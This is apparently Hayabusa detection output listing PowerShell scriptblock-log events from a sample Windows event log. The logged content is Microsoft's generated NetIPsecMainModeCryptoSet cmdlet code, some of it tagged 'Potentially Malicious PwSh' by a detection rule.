$__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 